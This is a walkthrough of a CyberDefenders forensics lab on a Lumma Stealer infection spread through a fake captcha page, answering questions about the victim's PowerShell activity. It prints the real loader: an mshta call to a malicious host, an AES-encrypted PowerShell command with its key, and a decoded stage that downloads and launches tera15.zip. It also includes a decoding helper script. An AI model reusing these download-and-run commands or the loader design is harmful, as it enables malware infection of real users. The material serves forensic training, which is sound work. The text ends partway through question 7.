LummaStealer Lab – CyberDefenders

Disk Analysis

Scenario

Lumma Stealer is a powerful malware written in C that secretly steals a wide range of data from infected systems. This MaaS (Malware-as-a-Service) tool has quickly become known for its ability to target and steal important information like cryptocurrency wallets, browser data, email credentials, financial details, personal files, and FTP client data. It uses advanced techniques like controlled data writing and encryption to avoid detection and increase its effectiveness. A new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages.

You have been given a disk triage from a machine that has fallen victim to this new attack. Your task is to analyze the malware and determine exactly what occurred on the machine.

Objective

Analyze multi-stage malware behavior, decode obfuscated scripts, trace execution flow, and identify evasion, persistence, and exfiltration tactics using forensic tools.

Questions

1. The victim has been deceived into executing an encoded PowerShell command on his device. What is this command in its decoded form?

  • I first converted the provided .evtx logs to CSV using EvtxECmd.exe
  • I then opened the CSV output in Timeline Explorer
  • Then I filtered on the PowerShell logs (Event ID 400) and found:

I decoded the base64 using CyberChef and found:

mshta "https://clicktogo.click/uploads/tra15"

2. What is the MITRE ATT&CK sub-technique ID for the technique used by the malware sample to download and execute its payload through a trusted system utility in the previous PowerShell command?

Searching on Google, we find “System Binary Proxy Execution: Mshta”, which has the ID T1218.005.

3. The victim was tricked by a fake verification website while browsing the internet. What is the URL of the malicious website to which the PowerShell command belongs?

Analyzing Edge History Artefact located at:

C:\Users\Administrator\Desktop\Start Here\Artifacts\Users\Infern0o\AppData\Local\Microsoft\Edge\User Data\Default

We find the following suspicious URL:

https://check-robot.b-cdn.net/Done-Captcha.html

4. In the second-stage of the malware execution, it downloads an additional file. What is the name of this file?

In the Temp directory, I found tera15.zip.

  • Additionally, I found an encrypted PowerShell command that downloads it.

Original PowerShell command (the Host Application field from the PowerShell log):
Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -ep Unrestricted -nop function llemiXA($iMYi){return -split ($iMYi -replace '..', '0x$& ')};$MeloNmjt = llemiXA('1EC0DD0BB73CA88CF5B0BD8263811B4B64E34C06A804D58C0D811D5C37129DB5FFAFF3FEB78DD5A8C99D9D7BA8C273BB91B1B75E06AB87A183EA7755CCABE7B6932D5F329F5305ACA6C3D7D808AC8765ECCC87F99F44C7296D2424100B42DF8C725C2951946060EA69ED332FE9E38A6EE3DBFE14005664EB807CD0D97E8066BAF32FB30305E9BCB1632DA3929F1A6D35F806B6ADA832BDD28C27DAC62E8048E082CC6076657EA67129E53CDD376F76BC7DD61EC02B7ABA914F3168EB1EC802A7D47907460C1BCB530B127B5FCABF6D0F9D323902BD023BB413216AD6E710BFEAE8D21715882AE9E8145DA4B7FF51E118407666DF27AF2374FDAC2F8086FEAE8FE51D21418E13D663E146D4EE51F5F66D45D68EC04D8BDBAC689AD4F09C3DD1889D47C47E909DA94FC6C3285BDB524410FC6F6E6F99D2BDCC82DF6D07CCDA6521E8ADAC7456B3212C7AAAC89D32FC8EC9FC0D4135BDBE19EB5FB37E391E633F1D5F9FCBF6BF94396BFDDB00A44C18EC929D97BAC9ADC3383B31DE685AC331D31AE6DE1803CE47C3989F203DE31546D749529FEE5B16CA01B5119C933223A1B21DE212CC321ABBD42CB8BF415900C9C0D5360406DE8CAEB2C91603FC7C299C270E67BEF0917E182D4D7001B7E4C5EBF710BC694C57E326F2783FF9150509431AB5845BD0B5A2FB07691DEE676D7FE0654BECB7AE175241E3AB495EC2D65D5FA126C5443E4E44B5F718C3F518D3E941E241D38BA855B06322364E61AC9182D5DD8987C5071A34732CE1F84365B97744A8C7A2831635E99E50D757B98A20C6197B58E622D1EC103C19D71DFA35AB4D021771DE08A5060B541FE76488C587576AD47238815B7FBEDF8844DE75EE77498A8FB1E5BDDB6EE2DF363851E223748EF1B17A596F8E039155ACC3BDA790ADDCBF1EE95768008B2D771A52CE8E589E9F41E7BA6474D9A49C0EE3265A11A92E9E877353A2EC2AA0CD2D8763F45633ABA0B37813EF274E4E88267E951079CA280E6AB2B7B5BD674929E47808B6B192871682FB41A2E73ED48375257811E5BC63B92DC423C8FB6712FCA16CA1A595A1BCB9327D94EBFA2B4C7F4AB78415731AD5812DB05B187FD30C3BFDA6647CE8154B7D6BA029C4FD0D39A343AABBB56A791659EC48C83E2CBE825B6CF31079E61E972368EB2F88EDECBB6AF363B82AE6C049BB8E07CBCC55522E2BAAEE50310A90229F69A91271804812F592BB8840D5C524D0920299C76866C9A35B890F3DA8B83F2433102A6354B210BD343
5C758E4C313534EFF96A183DCBE2BA01EE36A17A46655FC56F67378ED2427E2EF703212103C10AC91E393047B31FEF5057EC3EE13AC675F0B526EB9037DFB8B3E8BD228FF0EB4822623');$kCqXc = [System.Security.Cryptography.Aes]::Create();$kCqXc.Key = llemiXA('53626368526B457A4E4F695244796C53');$kCqXc.IV = New-Object byte[] 16;$MAElvXve = $kCqXc.CreateDecryptor();$qWOgiQdIE = $MAElvXve.TransformFinalBlock($MeloNmjt, 0, $MeloNmjt.Length);$jGAqRnDYn = [System.Text.Encoding]::Utf8.GetString($qWOgiQdIE);$MAElvXve.Dispose();& $jGAqRnDYn.Substring(0,3) $jGAqRnDYn.Substring(3)

Decoded PowerShell Command:

$zip = Join-Path $env:TEMP 'tera15.zip'
$url = 'https://clicktogo.click/uploads/tera15.zip'

if (-not (Test-Path $zip)) {
    (New-Object Net.WebClient).DownloadFile($url, $zip)
}

Expand-Archive -Path $zip -DestinationPath $env:TEMP -Force
$first = Get-ChildItem -Path $env:TEMP | Select-Object -First 1
Start-Process (Join-Path $env:TEMP $first.Name)
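Added analyst helper (not code from the writeup, the lab, or the malware): it re-implements the two decoding steps used above, the base64/UTF-16LE decode of the -EncodedCommand from question 1 and the hex-to-bytes plus AES-CBC (zero IV, key from the command in question 4) decrypt from question 4, so the stage can be read straight from the logged command line without executing the loader's final `&` line. The function names and the embedded sample inputs are constructed for this example.

```powershell
# Added analyst helper (not from the writeup or the malware): re-implements the
# loader's decoding so the stage can be read from the logged command line WITHOUT
# running its final "& <cmd> <args>" step. Key/zero IV are from question 4; samples are constructed.

# Question 1: -EncodedCommand (-enc/-e) is base64 over UTF-16LE text.
function ConvertFrom-EncodedCommand {
    param([string]$Base64)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Same transform as the loader's llemiXA(): hex string -> byte[].
function ConvertFrom-HexString {
    param([string]$Hex)
    [byte[]](-split ($Hex -replace '..', '0x$& '))
}

# Question 4: pull ciphertext and key out of the logged command line, decrypt
# as the loader does (Aes::Create() = AES-CBC/PKCS7, 16 zero-byte IV), return text.
function Get-DecryptedStage {
    param([string]$HostApplication)
    $ct  = [regex]::Match($HostApplication, "= \w+\('([0-9A-Fa-f]{32,})'\)").Groups[1].Value
    $key = [regex]::Match($HostApplication, "\.Key = \w+\('([0-9A-Fa-f]+)'\)").Groups[1].Value
    if (-not $ct -or -not $key) { throw 'Ciphertext or key not found in the log text.' }
    $aes = [Security.Cryptography.Aes]::Create()
    $aes.Key = ConvertFrom-HexString $key
    $aes.IV  = New-Object byte[] 16
    $bytes = ConvertFrom-HexString $ct
    $dec   = $aes.CreateDecryptor()
    $plain = [Text.Encoding]::UTF8.GetString($dec.TransformFinalBlock($bytes, 0, $bytes.Length))
    $dec.Dispose(); $aes.Dispose()
    # The loader runs $plain.Substring(0,3) (e.g. "iex") with the remainder as its argument.
    [pscustomobject]@{ Command = $plain.Substring(0, 3); Script = $plain.Substring(3) }
}

# Constructed sample: a harmless marker encrypted with the page's key and a zero
# IV, wrapped in the loader's syntax so the regexes above can find it.
function New-SampleHostApplication {
    $aes = [Security.Cryptography.Aes]::Create()
    $aes.Key = ConvertFrom-HexString '53626368526B457A4E4F695244796C53'   # ASCII "SbchRkEzNOiRDylS"
    $aes.IV  = New-Object byte[] 16
    $pt  = [Text.Encoding]::UTF8.GetBytes('iexWrite-Output "constructed stage, not the real one"')
    $enc = $aes.CreateEncryptor()
    $hex = [BitConverter]::ToString($enc.TransformFinalBlock($pt, 0, $pt.Length)).Replace('-', '')
    $enc.Dispose(); $aes.Dispose()
    "powershell.exe -w 1 -ep Unrestricted -nop `$c = f('$hex');`$a.Key = f('53626368526B457A4E4F695244796C53');"
}

ConvertFrom-EncodedCommand 'bQBzAGgAdABhAA=='          # constructed: UTF-16LE "mshta" in base64
Get-DecryptedStage (New-SampleHostApplication) | Format-List
```

To apply it to the real record, pass the full Host Application string from the Event ID 400 entry to Get-DecryptedStage; the regexes only need the `= name('<hex>')` and `.Key = name('<hex>')` shapes shown in the original command.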

5. What is the URL from which the above file was downloaded?

As found in the previous question after decoding the PowerShell Command:

https://clicktogo.click/uploads/tera15.zip

6. The malware performs process hollowing on a legitimate system process to evade detection. What is the name of this process?

I calculated the malware’s SHA256 using the following cmd command:

certutil -hashfile chkbkx.exe SHA256

I got the following result:

7c5b4be6d1d08fe5bc81f0ac5b3ec77f87f73b5a81eef0dd6f45255b22f08edd

I then checked the behavior on VirusTotal and found the injected legitimate process:

7. Monitoring the malware’s network activity can reveal the domains it intends to connect to. What is the first domain it attempts to connect to?

Using the same SHA256 hash as in the previous question, I analyzed the malware's network behaviour on VirusTotal and got the domain: